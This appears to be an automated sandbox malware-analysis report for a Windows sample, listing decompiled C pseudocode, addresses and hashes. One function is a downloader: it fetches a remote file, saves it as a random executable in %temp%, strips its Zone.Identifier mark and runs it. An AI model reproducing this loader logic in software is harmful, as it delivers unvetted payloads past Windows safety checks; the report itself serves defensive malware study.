                                                                                  0x00408cc2
                                                                                  0x00000000
                                                                                  0x00408ce8
                                                                                  0x00408ce8
                                                                                  0x00408ce8
                                                                                  0x00000000
                                                                                  0x00408ce6
                                                                                  0x00408cc8
                                                                                  0x00408cf3
                                                                                  0x00408cfc

                                                                                  APIs
                                                                                  • GetProcessHeaps.KERNEL32(000000FF,?), ref: 00408C8C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: HeapsProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1420622215-0
                                                                                  • Opcode ID: 2b4ffe97596f6e5a3cdf22d767e3bfa18bb42636863d7fc4f12c798a20e8a3c3
                                                                                  • Instruction ID: 782807d4e07a0b464ffc2b2183d444dd29adb49f067199873cbcda688cf91ce4
                                                                                  • Opcode Fuzzy Hash: 2b4ffe97596f6e5a3cdf22d767e3bfa18bb42636863d7fc4f12c798a20e8a3c3
                                                                                  • Instruction Fuzzy Hash: 730121F0809158CAEB208F14D9447A9B774EB45304F0081EADB4A37382C6781ECADF5E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID:
                                                                                  • API String ID: 542301482-0
                                                                                  • Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                  • Instruction ID: 32df2bfe7de06f0c235163c896e6267a06dc4b8e9f39d59c6c8874ca765da36c
                                                                                  • Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
                                                                                  • Instruction Fuzzy Hash: 0FE0127490020CFFDF00DF90C889BDEBBB9EB44315F1081A9E90467284D7B55A84CF95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E004092E0(signed int __edx, intOrPtr _a4, signed int _a8, signed int* _a12) {
                                                                                  				signed int _v8;
                                                                                  				signed int _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				signed int _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				signed char* _v28;
                                                                                  				intOrPtr _v32;
                                                                                  				signed int _v36;
                                                                                  				signed int _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				signed int _v48;
                                                                                  				signed int _v52;
                                                                                  				signed int _v56;
                                                                                  				intOrPtr _v60;
                                                                                  				intOrPtr _v64;
                                                                                  				signed int _v68;
                                                                                  				signed int _v72;
                                                                                  				signed int _v76;
                                                                                  				signed int _v80;
                                                                                  				signed int _v84;
                                                                                  				signed int _v88;
                                                                                  				signed int _v92;
                                                                                  				signed int _v96;
                                                                                  				signed int _t306;
                                                                                  				signed int _t336;
                                                                                  				void* _t502;
                                                                                  
                                                                                  				_v72 = 0;
                                                                                  				_v60 = _a4;
                                                                                  				asm("cdq");
                                                                                  				_v36 = _a8 + (__edx & 0x0000000f) >> 4;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v48 = 0;
                                                                                  				_v40 = 0;
                                                                                  				_v24 = 0x239b961b;
                                                                                  				_v32 = 0xab0e9789;
                                                                                  				_v16 = 0x38b34ae5;
                                                                                  				_v64 = 0xa1e38b93;
                                                                                  				_v44 = (_v36 << 4) + _v60;
                                                                                  				_v76 =  ~_v36;
                                                                                  				while(_v76 != 0) {
                                                                                  					_v92 = E00409120(_v44, _v76 << 2);
                                                                                  					_v88 = E00409120(_v44, 1 + _v76 * 4);
                                                                                  					_v84 = E00409120(_v44, 2 + _v76 * 4);
                                                                                  					_t336 = E00409120(_v44, 3 + _v76 * 4);
                                                                                  					_t502 = _t502 + 0x20;
                                                                                  					_v80 = _t336;
                                                                                  					_v92 = _v92 * 0x239b961b;
                                                                                  					asm("rol ecx, 0xf");
                                                                                  					_v92 = _v92 * 0xab0e9789;
                                                                                  					_v20 = _v20 ^ _v92;
                                                                                  					asm("rol ecx, 0x13");
                                                                                  					_v20 = _v20 + _v8;
                                                                                  					_v20 = 0x561ccd1b + _v20 * 5;
                                                                                  					_v88 = _v88 * 0xab0e9789;
                                                                                  					asm("rol edx, 0x10");
                                                                                  					_v88 = _v88 * 0x38b34ae5;
                                                                                  					_v8 = _v8 ^ _v88;
                                                                                  					asm("rol edx, 0x11");
                                                                                  					_v8 = _v8 + _v48;
                                                                                  					_v8 = 0xbcaa747 + _v8 * 5;
                                                                                  					_v84 = _v84 * 0x38b34ae5;
                                                                                  					asm("rol eax, 0x11");
                                                                                  					_v84 = _v84 * 0xa1e38b93;
                                                                                  					_v48 = _v48 ^ _v84;
                                                                                  					asm("rol eax, 0xf");
                                                                                  					_v48 = _v48 + _v40;
                                                                                  					_v48 = _v48 * 5 - 0x6932e3cb;
                                                                                  					_v80 = _v80 * 0xa1e38b93;
                                                                                  					asm("rol ecx, 0x12");
                                                                                  					_v80 = _v80 * 0x239b961b;
                                                                                  					_v40 = _v40 ^ _v80;
                                                                                  					asm("rol ecx, 0xd");
                                                                                  					_v40 = _v40 + _v20;
                                                                                  					_v40 = 0x32ac3b17 + _v40 * 5;
                                                                                  					_v76 = _v76 + 1;
                                                                                  				}
                                                                                  				_v28 = (_v36 << 4) + _v60;
                                                                                  				_v68 = 0;
                                                                                  				_v56 = 0;
                                                                                  				_v52 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v96 = _a8 & 0x0000000f;
                                                                                  				_v96 = _v96 - 1;
                                                                                  				if(_v96 <= 0xe) {
                                                                                  					switch( *((intOrPtr*)(_v96 * 4 +  &M004097C4))) {
                                                                                  						case 0:
                                                                                  							L20:
                                                                                  							_v68 =  *_v28 & 0x000000ff ^ _v68;
                                                                                  							_v68 = _v68 * 0x239b961b;
                                                                                  							asm("rol eax, 0xf");
                                                                                  							_v68 = _v68 * 0xab0e9789;
                                                                                  							_v20 = _v20 ^ _v68;
                                                                                  							goto L21;
                                                                                  						case 1:
                                                                                  							L19:
                                                                                  							_v68 = (_v28[1] & 0x000000ff) << 0x00000008 ^ _v68;
                                                                                  							goto L20;
                                                                                  						case 2:
                                                                                  							L18:
                                                                                  							_v68 = (_v28[2] & 0x000000ff) << 0x00000010 ^ _v68;
                                                                                  							goto L19;
                                                                                  						case 3:
                                                                                  							L17:
                                                                                  							_v68 = (_v28[3] & 0x000000ff) << 0x00000018 ^ _v68;
                                                                                  							goto L18;
                                                                                  						case 4:
                                                                                  							L16:
                                                                                  							_v56 = _v28[4] & 0x000000ff ^ _v56;
                                                                                  							_v56 = _v56 * 0xab0e9789;
                                                                                  							asm("rol eax, 0x10");
                                                                                  							_v56 = _v56 * 0x38b34ae5;
                                                                                  							_v8 = _v8 ^ _v56;
                                                                                  							goto L17;
                                                                                  						case 5:
                                                                                  							L15:
                                                                                  							_v56 = (_v28[5] & 0x000000ff) << 0x00000008 ^ _v56;
                                                                                  							goto L16;
                                                                                  						case 6:
                                                                                  							L14:
                                                                                  							_v56 = (_v28[6] & 0x000000ff) << 0x00000010 ^ _v56;
                                                                                  							goto L15;
                                                                                  						case 7:
                                                                                  							L13:
                                                                                  							_v56 = (_v28[7] & 0x000000ff) << 0x00000018 ^ _v56;
                                                                                  							goto L14;
                                                                                  						case 8:
                                                                                  							L12:
                                                                                  							_v52 = _v28[8] & 0x000000ff ^ _v52;
                                                                                  							_v52 = _v52 * 0x38b34ae5;
                                                                                  							asm("rol eax, 0x11");
                                                                                  							_v52 = _v52 * 0xa1e38b93;
                                                                                  							_v48 = _v48 ^ _v52;
                                                                                  							goto L13;
                                                                                  						case 9:
                                                                                  							L11:
                                                                                  							_v52 = (_v28[9] & 0x000000ff) << 0x00000008 ^ _v52;
                                                                                  							goto L12;
                                                                                  						case 0xa:
                                                                                  							L10:
                                                                                  							_v52 = (_v28[0xa] & 0x000000ff) << 0x00000010 ^ _v52;
                                                                                  							goto L11;
                                                                                  						case 0xb:
                                                                                  							L9:
                                                                                  							_v52 = (_v28[0xb] & 0x000000ff) << 0x00000018 ^ _v52;
                                                                                  							goto L10;
                                                                                  						case 0xc:
                                                                                  							L8:
                                                                                  							_v12 = _v28[0xc] & 0x000000ff ^ _v12;
                                                                                  							_v12 = _v12 * 0xa1e38b93;
                                                                                  							asm("rol eax, 0x12");
                                                                                  							_v12 = _v12 * 0x239b961b;
                                                                                  							_v40 = _v40 ^ _v12;
                                                                                  							goto L9;
                                                                                  						case 0xd:
                                                                                  							L7:
                                                                                  							_v12 = (_v28[0xd] & 0x000000ff) << 0x00000008 ^ _v12;
                                                                                  							goto L8;
                                                                                  						case 0xe:
                                                                                  							_v12 = (_v28[0xe] & 0x000000ff) << 0x00000010 ^ _v12;
                                                                                  							goto L7;
                                                                                  					}
                                                                                  				}
                                                                                  				L21:
                                                                                  				_v20 = _v20 ^ _a8;
                                                                                  				_v8 = _v8 ^ _a8;
                                                                                  				_v48 = _v48 ^ _a8;
                                                                                  				_v40 = _v40 ^ _a8;
                                                                                  				_v20 = _v20 + _v8;
                                                                                  				_v20 = _v20 + _v48;
                                                                                  				_v20 = _v20 + _v40;
                                                                                  				_v8 = _v8 + _v20;
                                                                                  				_v48 = _v48 + _v20;
                                                                                  				_v40 = _v40 + _v20;
                                                                                  				_v20 = E00409130(_v20);
                                                                                  				_v8 = E00409130(_v8);
                                                                                  				_v48 = E00409130(_v48);
                                                                                  				_v40 = E00409130(_v40);
                                                                                  				_v20 = _v20 + _v8;
                                                                                  				_v20 = _v20 + _v48;
                                                                                  				_v20 = _v20 + _v40;
                                                                                  				_v8 = _v8 + _v20;
                                                                                  				_v48 = _v48 + _v20;
                                                                                  				_v40 = _v40 + _v20;
                                                                                  				 *_a12 = _v20;
                                                                                  				_a12[1] = _v8;
                                                                                  				_a12[2] = _v48;
                                                                                  				_t306 = _v40;
                                                                                  				_a12[3] = _t306;
                                                                                  				return _t306;
                                                                                  			}





























                                                                                  0x004092e6
                                                                                  0x004092f0
                                                                                  0x004092f6
                                                                                  0x004092ff
                                                                                  0x00409302
                                                                                  0x00409309
                                                                                  0x00409310
                                                                                  0x00409317
                                                                                  0x0040931e
                                                                                  0x00409325
                                                                                  0x0040932c
                                                                                  0x00409333
                                                                                  0x00409343
                                                                                  0x0040934b
                                                                                  0x00409359
                                                                                  0x00409376
                                                                                  0x00409390
                                                                                  0x004093aa
                                                                                  0x004093bc
                                                                                  0x004093c1
                                                                                  0x004093c4
                                                                                  0x004093d0
                                                                                  0x004093d6
                                                                                  0x004093e5
                                                                                  0x004093ee
                                                                                  0x004093f4
                                                                                  0x00409400
                                                                                  0x0040940e
                                                                                  0x0040941a
                                                                                  0x00409420
                                                                                  0x0040942f
                                                                                  0x00409438
                                                                                  0x0040943e
                                                                                  0x0040944a
                                                                                  0x00409459
                                                                                  0x00409465
                                                                                  0x0040946b
                                                                                  0x0040947a
                                                                                  0x00409483
                                                                                  0x00409489
                                                                                  0x00409495
                                                                                  0x004094a4
                                                                                  0x004094b0
                                                                                  0x004094b6
                                                                                  0x004094c5
                                                                                  0x004094ce
                                                                                  0x004094d4
                                                                                  0x004094e0
                                                                                  0x004094ee
                                                                                  0x00409356
                                                                                  0x00409356
                                                                                  0x004094ff
                                                                                  0x00409502
                                                                                  0x00409509
                                                                                  0x00409510
                                                                                  0x00409517
                                                                                  0x00409524
                                                                                  0x0040952d
                                                                                  0x00409534
                                                                                  0x0040953d
                                                                                  0x00000000
                                                                                  0x00409699
                                                                                  0x004096a2
                                                                                  0x004096ae
                                                                                  0x004096b4
                                                                                  0x004096c3
                                                                                  0x004096cc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409689
                                                                                  0x00409696
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409679
                                                                                  0x00409686
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409669
                                                                                  0x00409676
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409632
                                                                                  0x0040963c
                                                                                  0x00409648
                                                                                  0x0040964e
                                                                                  0x0040965d
                                                                                  0x00409666
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409622
                                                                                  0x0040962f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409612
                                                                                  0x0040961f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409602
                                                                                  0x0040960f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004095cb
                                                                                  0x004095d5
                                                                                  0x004095e1
                                                                                  0x004095e7
                                                                                  0x004095f6
                                                                                  0x004095ff
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004095bb
                                                                                  0x004095c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004095ab
                                                                                  0x004095b8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040959b
                                                                                  0x004095a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409564
                                                                                  0x0040956e
                                                                                  0x0040957a
                                                                                  0x00409580
                                                                                  0x0040958f
                                                                                  0x00409598
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409554
                                                                                  0x00409561
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409551
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040953d
                                                                                  0x004096cf
                                                                                  0x004096d5
                                                                                  0x004096de
                                                                                  0x004096e7
                                                                                  0x004096f0
                                                                                  0x004096f9
                                                                                  0x00409702
                                                                                  0x0040970b
                                                                                  0x00409714
                                                                                  0x0040971d
                                                                                  0x00409726
                                                                                  0x00409735
                                                                                  0x00409744
                                                                                  0x00409753
                                                                                  0x00409762
                                                                                  0x0040976b
                                                                                  0x00409774
                                                                                  0x0040977d
                                                                                  0x00409786
                                                                                  0x0040978f
                                                                                  0x00409798
                                                                                  0x004097a1
                                                                                  0x004097a9
                                                                                  0x004097b2
                                                                                  0x004097b8
                                                                                  0x004097bb
                                                                                  0x004097c1

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6696025097f37fa636f8ea5ba2805a2caa9eb9538a37ce69a63a5005cce2f2de
                                                                                  • Instruction ID: 31e85414ae03b6fb680a6f7af3e30cc74686a058db12ae9e6508e8aaf28ea823
                                                                                  • Opcode Fuzzy Hash: 6696025097f37fa636f8ea5ba2805a2caa9eb9538a37ce69a63a5005cce2f2de
                                                                                  • Instruction Fuzzy Hash: CA128CB4D00219DFCB48CF99D991AAEFBB2BF88300F24856AE415BB345D734AA01CF54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 71%
                                                                                  			E0040F088(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				void* __ebp;
                                                                                  				signed int* _t43;
                                                                                  				char _t44;
                                                                                  				void* _t46;
                                                                                  				void* _t49;
                                                                                  				intOrPtr* _t53;
                                                                                  				void* _t54;
                                                                                  				void* _t65;
                                                                                  				long _t66;
                                                                                  				signed int* _t80;
                                                                                  				signed int* _t82;
                                                                                  				void* _t84;
                                                                                  				signed int _t86;
                                                                                  				void* _t89;
                                                                                  				void* _t95;
                                                                                  				void* _t96;
                                                                                  				void* _t99;
                                                                                  				void* _t106;
                                                                                  
                                                                                  				_t43 = _t84;
                                                                                  				_t65 = __ebx + 2;
                                                                                  				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                                                                  				_t89 = _t95;
                                                                                  				_t96 = _t95 - 8;
                                                                                  				_push(_t65);
                                                                                  				_push(_t84);
                                                                                  				_push(_t89);
                                                                                  				asm("cld");
                                                                                  				_t66 = _a8;
                                                                                  				_t44 = _a4;
                                                                                  				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                                                                  					_push(_t89);
                                                                                  					E0040F213(_t66 + 0x10, _t66, 0xffffffff);
                                                                                  					_t46 = 1;
                                                                                  				} else {
                                                                                  					_v12 = _t44;
                                                                                  					_v8 = _a12;
                                                                                  					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                                                                  					_t86 =  *(_t66 + 0xc);
                                                                                  					_t80 =  *(_t66 + 8);
                                                                                  					_t49 = E0040F2CD(_t66);
                                                                                  					_t99 = _t96 + 4;
                                                                                  					if(_t49 == 0) {
                                                                                  						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                                                                  						goto L11;
                                                                                  					} else {
                                                                                  						while(_t86 != 0xffffffff) {
                                                                                  							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                                                                  							if(_t53 == 0) {
                                                                                  								L8:
                                                                                  								_t80 =  *(_t66 + 8);
                                                                                  								_t86 = _t80[_t86 + _t86 * 2];
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_t54 =  *_t53();
                                                                                  								_t89 = _t89;
                                                                                  								_t86 = _t86;
                                                                                  								_t66 = _a8;
                                                                                  								_t55 = _t54;
                                                                                  								_t106 = _t54;
                                                                                  								if(_t106 == 0) {
                                                                                  									goto L8;
                                                                                  								} else {
                                                                                  									if(_t106 < 0) {
                                                                                  										_t46 = 0;
                                                                                  									} else {
                                                                                  										_t82 =  *(_t66 + 8);
                                                                                  										E0040F1B8(_t55, _t66);
                                                                                  										_t89 = _t66 + 0x10;
                                                                                  										E0040F213(_t89, _t66, 0);
                                                                                  										_t99 = _t99 + 0xc;
                                                                                  										E0040F2AF(_t82[2]);
                                                                                  										 *(_t66 + 0xc) =  *_t82;
                                                                                  										_t66 = 0;
                                                                                  										_t86 = 0;
                                                                                  										 *(_t82[2])(1);
                                                                                  										goto L8;
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  							goto L13;
                                                                                  						}
                                                                                  						L11:
                                                                                  						_t46 = 1;
                                                                                  					}
                                                                                  				}
                                                                                  				L13:
                                                                                  				return _t46;
                                                                                  			}























                                                                                  0x0040f08c
                                                                                  0x0040f08d
                                                                                  0x0040f08e
                                                                                  0x0040f091
                                                                                  0x0040f093
                                                                                  0x0040f096
                                                                                  0x0040f097
                                                                                  0x0040f099
                                                                                  0x0040f09a
                                                                                  0x0040f09b
                                                                                  0x0040f09e
                                                                                  0x0040f0a8
                                                                                  0x0040f159
                                                                                  0x0040f160
                                                                                  0x0040f169
                                                                                  0x0040f0ae
                                                                                  0x0040f0ae
                                                                                  0x0040f0b4
                                                                                  0x0040f0ba
                                                                                  0x0040f0bd
                                                                                  0x0040f0c0
                                                                                  0x0040f0c4
                                                                                  0x0040f0c9
                                                                                  0x0040f0ce
                                                                                  0x0040f14e
                                                                                  0x00000000
                                                                                  0x0040f0d0
                                                                                  0x0040f0d0
                                                                                  0x0040f0dc
                                                                                  0x0040f0de
                                                                                  0x0040f139
                                                                                  0x0040f139
                                                                                  0x0040f13f
                                                                                  0x00000000
                                                                                  0x0040f0e0
                                                                                  0x0040f0ef
                                                                                  0x0040f0f1
                                                                                  0x0040f0f2
                                                                                  0x0040f0f3
                                                                                  0x0040f0f6
                                                                                  0x0040f0f6
                                                                                  0x0040f0f8
                                                                                  0x00000000
                                                                                  0x0040f0fa
                                                                                  0x0040f0fa
                                                                                  0x0040f144
                                                                                  0x0040f0fc
                                                                                  0x0040f0fc
                                                                                  0x0040f100
                                                                                  0x0040f108
                                                                                  0x0040f10d
                                                                                  0x0040f112
                                                                                  0x0040f11e
                                                                                  0x0040f126
                                                                                  0x0040f12d
                                                                                  0x0040f133
                                                                                  0x0040f137
                                                                                  0x00000000
                                                                                  0x0040f137
                                                                                  0x0040f0fa
                                                                                  0x0040f0f8
                                                                                  0x00000000
                                                                                  0x0040f0de
                                                                                  0x0040f152
                                                                                  0x0040f152
                                                                                  0x0040f152
                                                                                  0x0040f0ce
                                                                                  0x0040f16e
                                                                                  0x0040f175

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 403510b0cf44a19509243faff8fda87969da86ef6f1582569b9df3b225e8f989
                                                                                  • Instruction ID: c89b1f1aed9b0248fc9c0d1501c666ce6946f3611ed6ad9513cfba108821c7e4
                                                                                  • Opcode Fuzzy Hash: 403510b0cf44a19509243faff8fda87969da86ef6f1582569b9df3b225e8f989
                                                                                  • Instruction Fuzzy Hash: F421B676900204DBCB20EF69C880967B7A5FF44350B4581BAED59AB285D734FD19C7E4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D890(char* _a4, signed int _a8) {
                                                                                  				short _v524;
                                                                                  				short _v1044;
                                                                                  				signed char _v1045;
                                                                                  				short _v1572;
                                                                                  				void* _v1576;
                                                                                  				void* _v1580;
                                                                                  				short _v2100;
                                                                                  				void _v2364;
                                                                                  				long _v2368;
                                                                                  				long _v2372;
                                                                                  				void* _v2376;
                                                                                  				intOrPtr* _v2380;
                                                                                  				intOrPtr _v2384;
                                                                                  				char _v2385;
                                                                                  				intOrPtr _v2392;
                                                                                  				signed int _t88;
                                                                                  				signed int _t90;
                                                                                  				int _t96;
                                                                                  				signed int _t97;
                                                                                  				signed int _t99;
                                                                                  				signed int _t101;
                                                                                  				signed int _t111;
                                                                                  				signed char _t125;
                                                                                  				signed char _t127;
                                                                                  				void* _t181;
                                                                                  				void* _t182;
                                                                                  				void* _t184;
                                                                                  
                                                                                  				srand(GetTickCount());
                                                                                  				_t182 = _t181 + 4;
                                                                                  				_v1045 = 0;
                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                  				_v2380 = _a4;
                                                                                  				_v2384 = _v2380 + 1;
                                                                                  				do {
                                                                                  					_v2385 =  *_v2380;
                                                                                  					_v2380 = _v2380 + 1;
                                                                                  				} while (_v2385 != 0);
                                                                                  				_v2392 = _v2380 - _v2384;
                                                                                  				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                  				_t88 = rand();
                                                                                  				asm("cdq");
                                                                                  				_t90 = rand();
                                                                                  				asm("cdq");
                                                                                  				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                  				_t184 = _t182 + 0x20;
                                                                                  				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36", 0, 0, 0, 0);
                                                                                  				if(_v2376 != 0) {
                                                                                  					_v1576 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0);
                                                                                  					if(_v1576 != 0) {
                                                                                  						_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
                                                                                  						if(_v1580 != 0xffffffff) {
                                                                                  							while(InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372) != 0 && _v2372 != 0) {
                                                                                  								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0);
                                                                                  							}
                                                                                  							CloseHandle(_v1580);
                                                                                  							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  							DeleteFileW( &_v524);
                                                                                  							Sleep(0x3e8);
                                                                                  							_t125 = E0040D580( &_v1572);
                                                                                  							_t184 = _t184 + 0x10;
                                                                                  							if((_t125 & 0x000000ff) == 0) {
                                                                                  								DeleteFileW( &_v1572);
                                                                                  							} else {
                                                                                  								Sleep(0x7d0);
                                                                                  								_t127 = E0040D740( &_v1572);
                                                                                  								_t184 = _t184 + 4;
                                                                                  								if((_t127 & 0x000000ff) == 1) {
                                                                                  									if((_a8 & 0x000000ff) == 1) {
                                                                                  										ExitProcess(0);
                                                                                  									}
                                                                                  									_v1045 = 1;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						CloseHandle(_v1580);
                                                                                  					}
                                                                                  					InternetCloseHandle(_v1576);
                                                                                  				}
                                                                                  				InternetCloseHandle(_v2376);
                                                                                  				Sleep(0x3e8);
                                                                                  				_t96 = _v1045 & 0x000000ff;
                                                                                  				if(_t96 == 0) {
                                                                                  					_t97 = rand();
                                                                                  					asm("cdq");
                                                                                  					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                  					_t99 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t101 = rand();
                                                                                  					asm("cdq");
                                                                                  					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                  					_push(0);
                                                                                  					_push(0);
                                                                                  					_push( &_v1572);
                                                                                  					_push( &_v1044);
                                                                                  					_push(0);
                                                                                  					L0040F052();
                                                                                  					if(_t96 == 0) {
                                                                                  						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                  						DeleteFileW( &_v524);
                                                                                  						Sleep(0x3e8);
                                                                                  						if((E0040D580( &_v1572) & 0x000000ff) == 0) {
                                                                                  							return DeleteFileW( &_v1572);
                                                                                  						}
                                                                                  						Sleep(0x7d0);
                                                                                  						_t111 = E0040D740( &_v1572) & 0x000000ff;
                                                                                  						if(_t111 == 0 || (_a8 & 0x000000ff) != 1) {
                                                                                  							return _t111;
                                                                                  						} else {
                                                                                  							ExitProcess(0);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				return _t96;
                                                                                  			}






























                                                                                  0x0040d8a0
                                                                                  0x0040d8a5
                                                                                  0x0040d8a8
                                                                                  0x0040d8c0
                                                                                  0x0040d8c9
                                                                                  0x0040d8d8
                                                                                  0x0040d8de
                                                                                  0x0040d8e6
                                                                                  0x0040d8ec
                                                                                  0x0040d8f3
                                                                                  0x0040d908
                                                                                  0x0040d923
                                                                                  0x0040d92b
                                                                                  0x0040d930
                                                                                  0x0040d93f
                                                                                  0x0040d944
                                                                                  0x0040d966
                                                                                  0x0040d96c
                                                                                  0x0040d982
                                                                                  0x0040d98f
                                                                                  0x0040d9b1
                                                                                  0x0040d9be
                                                                                  0x0040d9e0
                                                                                  0x0040d9ed
                                                                                  0x0040d9f3
                                                                                  0x0040da3e
                                                                                  0x0040da3e
                                                                                  0x0040da4d
                                                                                  0x0040da66
                                                                                  0x0040da76
                                                                                  0x0040da81
                                                                                  0x0040da8e
                                                                                  0x0040da93
                                                                                  0x0040da9b
                                                                                  0x0040dae0
                                                                                  0x0040da9d
                                                                                  0x0040daa2
                                                                                  0x0040daaf
                                                                                  0x0040dab4
                                                                                  0x0040dabd
                                                                                  0x0040dac6
                                                                                  0x0040daca
                                                                                  0x0040daca
                                                                                  0x0040dad0
                                                                                  0x0040dad0
